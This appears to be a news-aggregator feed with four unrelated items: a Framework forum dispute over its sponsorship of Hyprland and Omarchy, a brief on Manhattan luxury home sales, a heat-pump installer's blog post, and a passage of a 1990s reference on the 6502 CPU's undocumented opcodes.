Sign up for a TNR newsletter on politics, climate, culture and more.

Reminder about Framework Laptop

Lobsters
community.frame.work
2025-12-06 00:53:11
Comments...
Original Article

1

Hi,

I am not exactly sure how best to frame this, but recent events have got me wondering where exactly Framework, as a company, stands with regards to human rights and equality.

If I understand correctly (and please do correct me if I am wrong), it seems like Framework has started sponsoring Hyprland:

So I presume this is fact: Framework, as a company, has decided to sponsor a Wayland compositor who is well known to be led as a rather “toxic and hateful community” .

Separately, but on the same day, Framework seems to be promoting, in this tweet, another rather questionable project:

Omarchy is authored by David Heinemeier Hansson , also known as DHH, probably best known as the author of Ruby on Rails but also a racecar driver, apparently.

DHH is also a right-wing conspiracy nut, who seem to believe in the great displacement theory, according to this:

DHH was also involved in the recent upheaval in the Ruby community , where Rubygems, a core component of the Ruby ecosystem, was the victim of a hostile takeover , which DHH supported.

Even if you would decide (questionably) to ignore the man and take only his technical merit, the recent Rubygems drama should give anyone pause.

So my question is: where does Framework stand around this?

Ever since I got my first Framework laptop I’ve been excited by this company and its product. I bought a Framework 13 12th gen when it came out, and now i am typing this on a Framework 12. I’ve been recommending Framework for years at this point.

But if Framework keeps not only proposing and enabling toxic communities to its users but even sponsoring them, I’m afraid that not only will I have to stop buying and recommending Framework but that perhaps a more widespread boycott would be in order.

Surely this is just a mistake and a misunderstanding that could be promptly corrected.

2

We support open source software (and hardware), and partner with developers and maintainers across the ecosystem. We deliberately create a big tent, because we want open source software to win. We don’t partner based on individuals’ or organizations’ beliefs, values, or political stances outside of their alignment with us on increasing the adoption of open source software. We’ve sent out large quantities of hardware to folks at Fedora, Bluefin, Bazzite, NixOS, Arch Linux, Linux Mint, Omarchy, and many other distros, and have sponsored either the organizations directly or events with Linux Foundation, LVFS, NixOS, Debian, KDE, Hyprland, and others. Within the team itself, personal distro and OS preferences span basically every Linux distro you can imagine along with FreeBSD. I personally am running machines with Fedora (for machine learning), Bazzite (for gaming), Omarchy (general productivity), and Windows 11 (when I have to).

I definitely understand that not everyone will agree with taking a big tent approach, but we want to be transparent that bringing in and enabling every organization and community that we can across the Linux ecosystem is a deliberate choice.

Edit to add: This is a comment I recently added deep in this thread, but pasting it here so that folks don’t need to dig through to find it:

Update on Oct 14th, 2025:
A number of folks have reached out to us over the last few days to ask that we share more about which organizations we sponsor. This is certainly something we should have been doing already for transparency, and today we’ve published the list of all of our 2025 sponsorships so far, which total around $215,000. We’ll be keeping this list up to date over time. In addition, we would love nominations of a broader set of mission-aligned organizations we can sponsor, and we’ve created a submission form for this. As you can see from the list for this year, our focus is primarily around funding organizations developing Linux distros and window managers, open source firmware, educational organizations doing open source hardware development, and open source infrastructure that our hardware products and website depend on.

Since this thread started in part around our donation to Hyprland, we wanted to provide additional specific context there. We decided a few months ago to be more deliberate about funding the maturity of the Linux desktop by providing support to both distros and window managers. On the latter, we started sponsorship discussions with the GNOME Foundation ($1,000/month), KDE Foundation ($10,000/year), and Hyprland (600€/month) at the same time, with the plan to announce them together. We sent the funding to Hyprland and GNOME Foundation last week, and have been working with KDE Foundation to finalize our sponsorship. We’ve also been working with GNOME Foundation on announcement timing, as they needed to update the sponsor list on their site. We missed on letting Hyprland know that we wanted to announce these together, and they shared the sponsorship shortly after receiving it last week.

On Hyprland specifically, we were aware that there was past toxicity and controversy in their community, so we did research into it before deciding if we could sponsor the project. What we found was that there were past failures in moderation early in the creation of the project that had resulted in a toxic community, that the project lead vaxry had overhauled moderation years ago as a result, and that the community as it currently stands does not represent the one in which the issues occurred. Over the last few days, we’ve gotten additional outreach from others in the community who were initially concerned about our sponsorship of Hyprland who did their own research and came to a similar conclusion to what we did.

Going forward on this topic:

  1. We are going to continue to update our list of sponsorships as we go to give transparency on what we’re monetarily backing. As noted above, in general we want to coordinate the updates with the organizations we sponsor so that their website updates and announcements happen around the same time as ours.
  2. We’re requesting that you provide additional nominations of mission-aligned organizations that we should sponsor. Note that in the near-to-mid term, we’re still prioritizing organizations focused on open source firmware, software, and hardware that make the ecosystem around our products more mature and accessible. If you have recommendations of other good organizations, please feel free to submit those in the form as well, but they may come into future funding cycles.
  3. Before we sponsor an organization, we will continue to research and confirm that as they currently exist, they uphold appropriate community standards and are structurally set up for that to continue to be the case.
  4. Although this thread has continuously spiraled into unproductive directions that have needed active moderation, we do still plan to keep it open for now and merge additional related new threads into it. Please remember to follow our forum rules though and keep conversation productive and free of personal attacks.

3

With all due respect, I think you profoundly misunderstand the nature of my concern here.

This is not a “I do not like this distribution” kind of argument.

This is a “the people you are sending my money to want me and my friends dead or deported” kind of argument.

The “big tent” argument works fine if everyone plays by some basic civil rules of understanding. Stuff like code of conducts, moderation, anti-racism, surely those things we agree on? A big tent won’t work if you let in people that want to exterminate the others.

I have no problem with Fedora, Bluefin, Bazzite, Arch Linux, Linux Mint, Linux Foundation, LVFS, Debian, KDE… What I have a problem is with Framework consistently, repeatedly encouraging and now sponsoring individuals that have shown to be absolutely destructive to the open source community.

Claiming that this “increasing the adoption of open source software” really misses the core part of the narrative here, which is that those people have been excluded from open source communities because they were so hateful, so destructive, that their mere presence was more harmful than beneficial.

DHH is a threat to the free software community as a whole at this point. The damage he ended up doing to the Ruby community might end up outweighing entirely his contributions to Rails, which is no small feat.

Vaxry (from hyprland) was banned from freedesktop.org , wrecking havoc in standardizing Wayland protocols that the whole community could have benefited from.

If you believe helping and sponsoring those people helps the open source community, we have quite divergent views on the best way forward and, perhaps, it is best if you concentrate on making hardware and leave the open source community alone.

In any case, thanks for your quick response, @nrp , and thanks for building those awesome products.

4

Thanks, I appreciate you also replying in good faith. I don’t think this is likely to be a topic we’ll be able to come to alignment on within a community thread. We’re unfortunately in a world where it’s hard to have nuanced discussion, even if we preemptively agree on 95% of topics and want to discuss the remaining 5%, in a public forum.

5

perhaps it is indeed best to let it rest for now. i’ll certainly sleep on it now! :slight_smile:

6

Thanks a lot for your continued support of open source, I use projects daily that you donate money to, which makes me happy that I purchased my Framework Desktop rather than some offbrand Strix Halo mini-pc for a few bucks less.

In particular, I think that Hyprland is quite nice and I’ve been using it for about a year now. I haven’t touched other Hyprland distros, but I like that some people have found ways of making the normally very steep learning curve of Hyprland a little bit shallower for people to get used to it.

Can we not do this? It’s just a distro.

8

But Nirav,

Why is the Social Media account gushing over omarchy?

Out of all those listed projects you sponsor, the twitter account has mentioned omarchy ~22 times since just August. The other projects you mention has barely gotten any attention. Even to the point of miss attributing omarchy to be Arch Linux, which you do support.

Why are you pandering towards dhh and the omarchy project? What is the goal here?

I know in today’s hyper politicized day to day this might be hard to see, but it is because Omarchy is awesome. That isn’t a political statement in anyway. Just a nerdy, this software rocks my socks kind of thing.

I’m not saying anything beyond that above. Full stop.

I personally appreciate Framework’s efforts to create a big tent. We need that. Division in the computing world is massively overblown and is purely manufactured in many cases.

10

Yeah, if you make claims like that, maybe best if you provide some source or context of when these people have actually said they want anyone dead?

Thank you Nirav, your big tent approach is especially appreciated in these times of political polarisation.

Even if, as a public account of a company that will likely want to stay active in and around the open source community as a whole, you check who you interact with first and better stay away from controversial figures in that space.

I’m German, I just can’t say “whatever” and go on with this, in that time. I’ll send back my Framework 12, a device I truly love. A device I did all my workload for Arch Linux with for a whole month, as well as my day-to-day jobs stuff.

The big tent approach ends, where hate hurts people in the space who just want to contribute and have a fun time around others.

I don’t think that is possible in the open source world. I think the open source world attracts mostly controversial figures.

I also don’t think any one person or organization can speak for open source. That is the whole point. Decentralized. Hundreds of thousands of people with varying ideas and beliefs made all of the software in the open source world.

14

Those “remaining 5%” are either supporting fascism or not supporting fascism, and thus way more important than the other 95%.

If you keep this up, buying framework laptops means directly contributing money to the pockets of people who want me gone or dead. Doesn’t matter that it’s the best laptop available and I’ve had good experiences with every framework device I’ve bought so far, i will have to settle for worse in the future because i morally can’t justify giving my money to a company that forwards it to fascists.

What? I am relatively new to knowing and talking with DHH, but I have not seen anything he has said that would lend credence to what you are saying here. Furthermore these are heavy accusations. I see zero shred of evidence on the internet or revolving around Omarchy. I haven’t see a single negative thing coming out of my discourse around Omarchy. The focus is software excellence, and it is awesome.

If Framework is now knowingly giving money directly to far-right, anti-immigration fascists, I will no longer give money to Framework or recommend Framework. And I will make sure everyone I know does the same. You could have made a good choice here. This “big tent” approach only works when some of the people in the “big tent” aren’t trying to get the other ones exiled or killed. Wrong side of history.


Addendum to this: I personally would love if this was an “apolitical” conversation only about software, and disagreements about software. But the people that Framework is sponsoring are using their platforms – earned in the first place by writing software – to promote fascist conspiracy theories that are about anything but software.

This is not a case of “oh those lefty nutjobs are canceling people again”, it’s a case of “these racists [like DHH] are so damn racist that they can’t stop using their platform to be racist as hell, even though they are ostensibly software developers, and could have chosen to stay in their lane and write software.” Have yourself a little ponder about who started it when you’re saying things like “oh let’s keep software apolitical.”


Additional edit: I think it’s quite telling that a community response of “I’m not happy with this development, please consider changing your mind or I’m going to spend my money elsewhere” is now being met in this thread with responses including inflammatory fascist and racist talking points, transphobia, etc, while Framework says and does nothing about it. It shows exactly the sorts of things Framework is permitting in their “big tent” by rewarding right-wing extremists with money and sponsorship. What a way to tank a community that – a few years ago at least – seemed pretty welcoming and inclusive.

17

You may disagree with Drew DeVault but this was easily reachable with a simple google search.

So evidence and proof is the opinion of a known activist with specific political leanings? An activist that has said and done many controversial things as well, I might add.

This is a very odd thing to say. There are really crazy people out there, one recently assassinated a guy for just having conversations with people. Projecting untrue ideas on to those you disagree with is kinda the whole problem we are having.

That said, I applaud NRPs response here. I like good open source software. I do not care about the politics of the people behind the software, unless they are using that software to enforce beliefs that do not enhance my life, which is rare. In those cases, I simply find something better to use.

And remember, the great thing about open source software is you can fork it if you don’t like something about the original project. xlibre is an awesome example of this. Xorg was forked and now we are seeing real progress on, what has been for a long time, a stale project.

20

You can also read and follow the links specifically to what DHH is saying. I find it odd in a conversation about big tent inclusion to immediately exclude something without reading it, though.

Rich NYers Aren’t Fleeing After All

Portside
portside.org
2025-12-06 00:44:06
Rich NYers Aren’t Fleeing After All barry Fri, 12/05/2025 - 19:44 ...
Original Article
Rich NYers Aren’t Fleeing After All Published

Zohran Mamdani at the Resist Fascism Rally in Bryant Park on Oct 27th 2024 | photo: Bingjiefu He (Creative Commons Share Alike 4.0)

Fears that Zohran Mamdani's election as mayor would trigger an exodus of wealthy New Yorkers appear to be overblown, as sales of Manhattan luxury homes surged in November. According to data from Miller Samuel Inc. and Douglas Elliman, contracts were signed for 176 homes priced at $4 million or higher last month—a 25% rise from October, per Bloomberg .

The deals included two $24 million condos at high-profile buildings on the Upper East Side and Billionaires' Row. Critics had warned that Mamdani's victory would scare off the city's rich, whose taxes are vital to the city budget. But Donna Olshan of Olshan Realty says the numbers tell a different story. Her firm's report found that 41 luxury contracts were signed during the week of the election, with more than half coming after Mamdani's win. "There is no Mamdani effect," Olshan said. "The numbers just aren't bearing that out."

Per ABC News , some experts predicted this outcome weeks ago, noting that whenever wealthy residents warn they'll leave states like California during, say, a tax increase, "the vast majority stay put for reasons that hold true across income brackets: They like where they live, and want to remain close to friends, family, and professional networks." A tax attorney estimates that, over the course of his career, for every 10 people who've asked about what it would take to leave New York, only one ends up following through, due to the financial and social complexities in making such a move, per the New York Times .

Industry insiders point to other factors fueling the Big Apple market, including a stock market rally and robust Wall Street bonuses, per the Journal . Miki Naftali of the Naftali Group said demand remains strong, with no slowdown in sales at his company's Manhattan developments, where condos can fetch as much as $28 million. "Yes, there is a new mayor, and there are a lot of worries, but our clients are saying, 'We love New York,'" Naftali said.

joined Newser in 2014. Prior to that, Jenn was the copy chief at Saveur magazine, as well as an editor/writer for MSN, AOL, Reader's Digest, and Scholastic, among others. Her coverage for Newser concentrates on politics and other social sciences, as well as entertainment.

Newser is a news curator with a kick. Since 2007, our mission has been simple: make the news faster and easier to consume. Our editors hand-select stories from hundreds of trusted US and international outlets and distill them into sharply written, easy-to-digest news briefs.

From Rockets to Heat Pumps

Hacker News
www.heatpumped.org
2025-12-06 00:41:42
Comments...
Original Article

Usually I’m the one interviewing people about electrification on the Heat Pumped Podcast . Recently, I got to flip roles a bit as a guest on Less Talk, More Action . I was stoked to get the invite - I loved their interview with Panama Bartholomy from Building Decarbonization Coalition, who is ever the optimist reminding us that we ARE making progress electrifying.

Joel and Owen peppered me with questions about heat pumps, bad incentives, and why on earth someone would leave rockets for HVAC.

🎧 Listen to the full episode

The Question Everyone Asks: “Will a Heat Pump Save Me Money?”

Let’s start with the uncomfortable part.

Owen opened with the question I hear constantly:

“How do we get the masses to adopt heat pumps when gas is so much cheaper than electricity, especially in California?”

  • Heat pumps really are 3–4x more efficient than gas furnaces.

  • But in much of California, electricity is also 3–4x more expensive than gas .

  • That means the operating costs often come out roughly even , maybe a bit better, maybe a bit worse, depending on the house and rate structure.

I wish I could tell people, “Install a heat pump and your bills will drop by 50%.” Right now, in most of California, I can’t. And I don’t try to force that narrative.

So instead of pretending there’s a huge savings where there isn’t, I lean on what is true:

  • You get heating and cooling in one system .

  • Comfort is better and more stable - no more furnace cycling on and off at full blast.

  • There’s no combustion, no carbon monoxide risk .

  • With incentives, upfront cost is often lower than installing a traditional AC and furnace .

Is it a financial slam dunk everywhere? No.
Is it a better system that future-proofs the home, often at similar lifetime cost? In most cases, yes.

A Quick Heat Pump Explainer

When I say “3–4x more efficient,” here’s what I mean in plain terms:

  • A gas furnace is ~80–95% efficient. You burn gas, some energy goes out the flue, the rest warms your home. You’re creating heat from fuel.

  • A heat pump doesn’t “make” heat; it moves it .

    • Even on a cold day, molecules in the air are moving—that motion is heat.

    • A heat pump pulls that heat out of the air, concentrates it, and moves it indoors.

    • It’s the same physics as your refrigerator or air conditioner, just run in reverse in winter.

Heat pumps move heat instead of generating it

How I Ended Up Trading Rocket Engines for Heat Pumps

People love to ask how I went from working at companies like SpaceX and Blue Origin to HVAC.

Standing by a Blue Origin lunar lander - I helped design its engine

To be honest, I didn’t wake up one day and ~decide~ to go into heat pumps. It was a winding path , but I’m grateful I found my way to this space.

When I eventually started DMing homeowners on Reddit and Nextdoor asking them, “What was your experience getting a heat pump?”, t he answers were almost all identical:

  • “It’s really expensive.”

  • “I don’t trust my contractor.”

  • “I’m getting conflicting advice.”

Seeing the obvious pain from real people and realizing that I already understood the technical side was enough to pull me in, eventually leading to my heat pump installation company Vayu .

The Bar Is Still So Low

What’s wild, and a little sad, is how low the baseline for “good contractor” still is.

  • My mom texts four contractors; one replies. That’s who gets the job.

  • My in-laws had multiple appointments rescheduled by their solar installer, often with techs showing up hours late.

  • Owen talked about winning a $7M contract basically by just being responsive.

This is part of why I keep saying:

If you want to do something meaningful in climate and have a high tolerance for chaos, start an HVAC company .

Hearing the same frustrations over and over led me to starting my own heat pump company

You don’t need to be the biggest. You just need to show up, do what you say you’re going to do, and care about the quality of your work.

Incentives, the IRA, and Why Some “Climate Money” Backfires

  • People heard for years that huge electrification rebates were coming.

  • Some homeowners delayed critical work, hoping for $8,000+ off a heat pump .

  • In places like Northern California, once funds finally went live, they were gone in a month or two .

So what did we actually achieve?

  • We froze some homeowners in place waiting for programs.

  • We created a huge expectation mismatch.

  • We did not fundamentally change the default equipment being installed.

  • The cost difference between a one-way AC and a heat pump is basically a reversing valve (~$30–$50 in parts).

  • Every major manufacturer already sells both the AC and corresponding heat pump versions of their product.

  • If we subsidized that tiny delta at the manufacturer or distributor level, one-way ACs could just quietly fade out .

Every “normal” AC replacement would automatically be a heat pump. Not because the homeowner read a whitepaper, but because that’s what’s on the truck.

Perfectionism Is Quietly Killing Decarbonization

  1. Air seal and insulate

  2. Replace windows

  3. Upgrade panel and wiring

  4. Maybe, finally, install the heat pump

On a whiteboard, that looks great. In real life:

  • Furnaces die right before a cold snap .

  • People don’t have unlimited capital, bandwidth, or patience.

  • The more steps you stack up front, the more likely they are to say:
    “Just put in another gas furnace.”

In California, at least, I’m very comfortable with electrify first, optimize later :

  • Even leaky, old homes can usually be handled by a modestly sized inverter heat pump.

  • If you upgrade windows and insulation later, the same heat pump just runs at a lower output.

Coming from rocketry, I think in test cycles. You build, test, learn, adjust. If you wait for the perfect model, you never launch anything.

Homes are no different.

Why I’m Still Optimistic

We often talk about the ugly in this newsletter - the barriers that are slowing down widespread heat pump adoption. I see a lot of dysfunction up close: bad incentives, messy rates, hilariously low contracting standards.

But here’s what gives me real hope:

I’m in a Facebook group with a bunch of small HVAC contractors. Recently someone asked: “Who’s installing heat pumps these days?”

A couple of years ago, that would’ve drawn skeptical or hostile replies. This time, I’d guess 80–90% of the responses were some version of:

  • “We’re doing a lot of heat pumps now.”

  • “Most of our installs are heat pumps.”

  • “We only do heat pumps.”

Not from giant, well-branded west coast climate companies. From one- and two-truck shops all over the place.

This is market transformation in action

That’s the kind of quiet, unglamorous market shift that actually matters.

So I’m going to keep doing what I’ve been doing: Talking about heat pumps and installing them.

If any of this nudges one more person to leave the sidelines - whether that means starting a trades business, fixing a broken rate design, or just replacing a dead furnace with a heat pump instead of another gas box - it’s worth it.

Extra Instructions of the 65XX Series CPU

Hacker News
www.ffd2.com
2025-12-06 00:38:50
Comments...
Original Article
"Extra Instructions Of The 65XX Series CPU" By: Adam Vardy (abe0084@infonet.st-johns.nf.ca) [File created: 22, Aug. 1995... 27, Sept. 1996] The following is a list of 65XX/85XX extra opcodes. The operation codes for the 6502 CPU fit in a single byte; out of 256 possible combinations, only 151 are "legal." This text describes the other 256-151= 105 operation codes. These opcodes are not generally recognized as part of the 6502 instruction set. They are also referred to as undefined opcodes or undocumented opcodes or non-standard opcodes or unofficial opcodes. In "The Commodore 64 Programmer's Reference Guide" their hexadecimal values are simply marked as future expansion. This list of opcodes was compiled with help from "The Complete Inner Space Anthology" by Karl J. H. Hildon. I have marked off the beginning of the description of each opcode with a few asterisks. At times, I also included an alternate name in parenthesis. All opcode values are given in hexadecimal. These hexadecimal values are listed immediately to the right of any sample code. The lowercase letters found in these examples represent the hex digits that you must provide as the instruction's immediate byte value or as the instruction's destination or source address. Thus immediate values and zero page addresses are referred to as 'ab'. For absolute addressing mode the two bytes of an absolute address are referred to as 'cd' and 'ab'. Execution times for all opcodes are given alongside to the very right of any sample code. A number of the opcodes described here combine the operation of two regular 6502 instructions. You can refer to a book on the 6502 instruction set for more information, such as which flags a particular instruction affects. ASO *** (SLO) This opcode ASLs the contents of a memory location and then ORs the result with the accumulator. Supported modes: ASO abcd ;0F cd ab ;No. Cycles= 6 ASO abcd,X ;1F cd ab ; 7 ASO abcd,Y ;1B cd ab ; 7 ASO ab ;07 ab ; 5 ASO ab,X ;17 ab ; 6 ASO (ab,X) ;03 ab ; 8 ASO (ab),Y ;13 ab ; 8 (Sub-instructions: ORA, ASL) Here is an example of how you might use this opcode: ASO $C010 ;0F 10 C0 Here is the same code using equivalent instructions. ASL $C010 ORA $C010 RLA *** RLA ROLs the contents of a memory location and then ANDs the result with the accumulator. Supported modes: RLA abcd ;2F cd ab ;No. Cycles= 6 RLA abcd,X ;3F cd ab ; 7 RLA abcd,Y ;3B cd ab ; 7 RLA ab ;27 ab ; 5 RLA ab,X ;37 ab ; 6 RLA (ab,X) ;23 ab ; 8 RLA (ab),Y ;33 ab ; 8 (Sub-instructions: AND, ROL) Here's an example of how you might write it in a program. RLA $FC,X ;37 FC Here's the same code using equivalent instructions. ROL $FC,X AND $FC,X LSE *** (SRE) LSE LSRs the contents of a memory location and then EORs the result with the accumulator. Supported modes: LSE abcd ;4F cd ab ;No. Cycles= 6 LSE abcd,X ;5F cd ab ; 7 LSE abcd,Y ;5B cd ab ; 7 LSE ab ;47 ab ; 5 LSE ab,X ;57 ab ; 6 LSE (ab,X) ;43 ab ; 8 LSE (ab),Y ;53 ab ; 8 (Sub-instructions: EOR, LSR) Example: LSE $C100,X ;5F 00 C1 Here's the same code using equivalent instructions. LSR $C100,X EOR $C100,X RRA *** RRA RORs the contents of a memory location and then ADCs the result with the accumulator. Supported modes: RRA abcd ;6F cd ab ;No. Cycles= 6 RRA abcd,X ;7F cd ab ; 7 RRA abcd,Y ;7B cd ab ; 7 RRA ab ;67 ab ; 5 RRA ab,X ;77 ab ; 6 RRA (ab,X) ;63 ab ; 8 RRA (ab),Y ;73 ab ; 8 (Sub-instructions: ADC, ROR) Example: RRA $030C ;6F 0C 03 Equivalent instructions: ROR $030C ADC $030C AXS *** (SAX) AXS ANDs the contents of the A and X registers (without changing the contents of either register) and stores the result in memory. AXS does not affect any flags in the processor status register. Supported modes: AXS abcd ;8F cd ab ;No. Cycles= 4 AXS ab ;87 ab ; 3 AXS ab,Y ;97 ab ; 4 AXS (ab,X) ;83 ab ; 6 (Sub-instructions: STA, STX) Example: AXS $FE ;87 FE Here's the same code using equivalent instructions. STX $FE PHA AND $FE STA $FE PLA LAX *** This opcode loads both the accumulator and the X register with the contents of a memory location. Supported modes: LAX abcd ;AF cd ab ;No. Cycles= 4 LAX abcd,Y ;BF cd ab ; 4* LAX ab ;A7 ab ;*=add 1 3 LAX ab,Y ;B7 ab ;if page 4 LAX (ab,X) ;A3 ab ;boundary 6 LAX (ab),Y ;B3 ab ;is crossed 5* (Sub-instructions: LDA, LDX) Example: LAX $8400,Y ;BF 00 84 Equivalent instructions: LDA $8400,Y LDX $8400,Y DCM *** (DCP) This opcode DECs the contents of a memory location and then CMPs the result with the A register. Supported modes: DCM abcd ;CF cd ab ;No. Cycles= 6 DCM abcd,X ;DF cd ab ; 7 DCM abcd,Y ;DB cd ab ; 7 DCM ab ;C7 ab ; 5 DCM ab,X ;D7 ab ; 6 DCM (ab,X) ;C3 ab ; 8 DCM (ab),Y ;D3 ab ; 8 (Sub-instructions: CMP, DEC) Example: DCM $FF ;C7 FF Equivalent instructions: DEC $FF CMP $FF INS *** (ISC) This opcode INCs the contents of a memory location and then SBCs the result from the A register. Supported modes: INS abcd ;EF cd ab ;No. Cycles= 6 INS abcd,X ;FF cd ab ; 7 INS abcd,Y ;FB cd ab ; 7 INS ab ;E7 ab ; 5 INS ab,X ;F7 ab ; 6 INS (ab,X) ;E3 ab ; 8 INS (ab),Y ;F3 ab ; 8 (Sub-instructions: SBC, INC) Example: INS $FF ;E7 FF Equivalent instructions: INC $FF SBC $FF ALR *** This opcode ANDs the contents of the A register with an immediate value and then LSRs the result. One supported mode: ALR #ab ;4B ab ;No. Cycles= 2 Example: ALR #$FE ;4B FE Equivalent instructions: AND #$FE LSR A ARR *** This opcode ANDs the contents of the A register with an immediate value and then RORs the result. One supported mode: ARR #ab ;6B ab ;No. Cycles= 2 Here's an example of how you might write it in a program. ARR #$7F ;6B 7F Here's the same code using equivalent instructions. AND #$7F ROR A XAA *** XAA transfers the contents of the X register to the A register and then ANDs the A register with an immediate value. One supported mode: XAA #ab ;8B ab ;No. Cycles= 2 Example: XAA #$44 ;8B 44 Equivalent instructions: TXA AND #$44 OAL *** This opcode ORs the A register with #$EE, ANDs the result with an immediate value, and then stores the result in both A and X. One supported mode: OAL #ab ;AB ab ;No. Cycles= 2 Here's an example of how you might use this opcode: OAL #$AA ;AB AA Here's the same code using equivalent instructions: ORA #$EE AND #$AA TAX SAX *** SAX ANDs the contents of the A and X registers (leaving the contents of A intact), subtracts an immediate value, and then stores the result in X. ... A few points might be made about the action of subtracting an immediate value. It actually works just like the CMP instruction, except that CMP does not store the result of the subtraction it performs in any register. This subtract operation is not affected by the state of the Carry flag, though it does affect the Carry flag. It does not affect the Overflow flag. One supported mode: SAX #ab ;CB ab ;No. Cycles= 2 Example: SAX #$5A ;CB 5A Equivalent instructions: STA $02 TXA AND $02 SEC SBC #$5A TAX LDA $02 Note: Memory location $02 would not be altered by the SAX opcode. NOP *** NOP performs no operation. Opcodes: 1A, 3A, 5A, 7A, DA, FA. Takes 2 cycles to execute. SKB *** SKB stands for skip next byte. Opcodes: 80, 82, C2, E2, 04, 14, 34, 44, 54, 64, 74, D4, F4. Takes 2, 3, or 4 cycles to execute. SKW *** SKW skips next word (two bytes). Opcodes: 0C, 1C, 3C, 5C, 7C, DC, FC. Takes 4 cycles to execute. To be dizzyingly precise, SKW actually performs a read operation. It's just that the value read is not stored in any register. Further, opcode 0C uses the absolute addressing mode. The two bytes which follow it form the absolute address. All the other SKW opcodes use the absolute indexed X addressing mode. If a page boundary is crossed, the execution time of one of these SKW opcodes is upped to 5 clock cycles. -------------------------------------------------------------------------- The following opcodes were discovered and named exclusively by the author. (Or so it was thought before.) HLT *** HLT crashes the microprocessor. When this opcode is executed, program execution ceases. No hardware interrupts will execute either. The author has characterized this instruction as a halt instruction since this is the most straightforward explanation for this opcode's behaviour. Only a reset will restart execution. This opcode leaves no trace of any operation performed! No registers affected. Opcodes: 02, 12, 22, 32, 42, 52, 62, 72, 92, B2, D2, F2. TAS *** This opcode ANDs the contents of the A and X registers (without changing the contents of either register) and transfers the result to the stack pointer. It then ANDs that result with the contents of the high byte of the target address of the operand +1 and stores that final result in memory. One supported mode: TAS abcd,Y ;9B cd ab ;No. Cycles= 5 (Sub-instructions: STA, TXS) Here is an example of how you might use this opcode: TAS $7700,Y ;9B 00 77 Here is the same code using equivalent instructions. STX $02 PHA AND $02 TAX TXS AND #$78 STA $7700,Y PLA LDX $02 Note: Memory location $02 would not be altered by the TAS opcode. Above I used the phrase 'the high byte of the target address of the operand +1'. By the words target address, I mean the unindexed address, the one specified explicitly in the operand. The high byte is then the second byte after the opcode (ab). So we'll shorten that phrase to AB+1. SAY *** This opcode ANDs the contents of the Y register with and stores the result in memory. One supported mode: SAY abcd,X ;9C cd ab ;No. Cycles= 5 Example: SAY $7700,X ;9C 00 77 Equivalent instructions: PHA TYA AND #$78 STA $7700,X PLA XAS *** This opcode ANDs the contents of the X register with and stores the result in memory. One supported mode: XAS abcd,Y ;9E cd ab ;No. Cycles= 5 Example: XAS $6430,Y ;9E 30 64 Equivalent instructions: PHA TXA AND #$65 STA $6430,Y PLA AXA *** This opcode stores the result of A AND X AND the high byte of the target address of the operand +1 in memory. Supported modes: AXA abcd,Y ;9F cd ab ;No. Cycles= 5 AXA (ab),Y ;93 ab ; 6 Example: AXA $7133,Y ;9F 33 71 Equivalent instructions: STX $02 PHA AND $02 AND #$72 STA $7133,Y PLA LDX $02 Note: Memory location $02 would not be altered by the AXA opcode. The following notes apply to the above four opcodes: TAS, SAY, XAS, AXA. None of these opcodes affect the accumulator, the X register, the Y register, or the processor status register! The author has no explanation for the complexity of these instructions. It is hard to comprehend how the microprocessor could handle the convoluted sequence of events which appears to occur while executing one of these opcodes. A partial explanation for what is going on is that these instructions appear to be corruptions of other instructions. For example, the opcode SAY would have been one of the addressing modes of the standard instruction STY (absolute indexed X) were it not for the fact that the normal operation of this instruction is impaired in this particular instance. One irregularity uncovered is that sometimes the actual value is stored in memory, and the AND with part drops off (ex. SAY becomes true STY). This happens very infrequently. The behaviour appears to be connected with the video display. For example, it never seems to occur if either the screen is blanked or C128 2MHz mode is enabled. --- Imported example --- Here is a demo program to illustrate the above effect. SYS 8200 to try it. There is no exit, so you'll have to hit Stop-Restore to quit. And you may want to clear the screen before running it. For contrast, there is a second routine which runs during idle state display. Use SYS 8211 for it. After trying the second routine, check it out again using POKE 53269,255 to enable sprites. begin 640 say->sty D"""B`*`@G``%Z$P,("P1T##[+!'0$/NB`*`@G``%Z-#Z3!,@ ` end --- Text import end --- WARNING: If the target address crosses a page boundary because of indexing, the instruction may not store at the intended address. It may end up storing in zero page, or another address altogether (page=value stored). Apparently certain internal 65XX registers are being overridden. The whole scheme behind this erratic behaviour is very complex and strange. And continuing with the list... ANC *** ANC ANDs the contents of the A register with an immediate value and then moves bit 7 of A into the Carry flag. This opcode works basically identically to AND #immed. except that the Carry flag is set to the same state that the Negative flag is set to. One supported mode: ANC #ab ;2B ab ;No. Cycles= 2 ANC #ab ;0B ab (Sub-instructions: AND, ROL) OPCODE 89 Opcode 89 is another SKB instruction. It requires 2 cycles to execute. LAS *** This opcode ANDs the contents of a memory location with the contents of the stack pointer register and stores the result in the accumulator, the X register, and the stack pointer. Affected flags: N Z. One supported mode: LAS abcd,Y ;BB cd ab ;No. Cycles= 4* OPCODE EB Opcode EB seems to work exactly like SBC #immediate. Takes 2 cycles. That is the end of the list. This list is a full and complete list of all undocumented opcodes, every last hex value. It provides complete and thorough information and it also corrects some incorrect information found elsewhere. The opcodes MKA and MKX (also known as TSTA and TSTX) as described in "The Complete Commodore Inner Space Anthology" do not exist. Also, it is erroneously indicated there that the instructions ASO, RLA, LSE, RRA have an immediate addressing mode. (RLA #ab would be ANC #ab.) [Recent additions to this text file] Here are some other more scrutinizing observations. The opcode ARR operates more complexily than actually described in the list above. Here is a brief rundown on this. The following assumes the decimal flag is clear. You see, the sub-instruction for ARR ($6B) is in fact ADC ($69), not AND. While ADC is not performed, some of the ADC mechanics are evident. Like ADC, ARR affects the overflow flag. The following effects occur after ANDing but before RORing. The V flag is set to the result of exclusive ORing bit 7 with bit 6. Unlike ROR, bit 0 does not go into the carry flag. The state of bit 7 is exchanged with the carry flag. Bit 0 is lost. All of this may appear strange, but it makes sense if you consider the probable internal operations of ADC itself. SKB opcodes 82, C2, E2 may be HLTs. Since only one source claims this, and no other sources corroborate this, it must be true on very few machines. On all others, these opcodes always perform no operation. LAS is suspect. This opcode is possibly unreliable. OPCODE BIT-PATTERN: 10x0 1011 Now it is time to discuss XAA ($8B) and OAL ($AB). A fair bit of controversy has surrounded these two opcodes. There are two good reasons for this. 1 - They are rather weird in operation. 2 - They do operate differently on different machines. Highly variable. Here is the basic operation. OAL This opcode ORs the A register with #xx, ANDs the result with an immediate value, and then stores the result in both A and X. On my 128, xx may be EE,EF,FE, OR FF. These possibilities appear to depend on three factors: the X register, PC, and the previous instruction executed. Bit 0 is ORed from x, and also from PCH. As for XAA, on my 128 this opcode appears to work exactly as described in the list. On my 64, OAL produces all sorts of values for xx: 00,04,06,80, etc... A rough scenario I worked out to explain this is here. The constant value 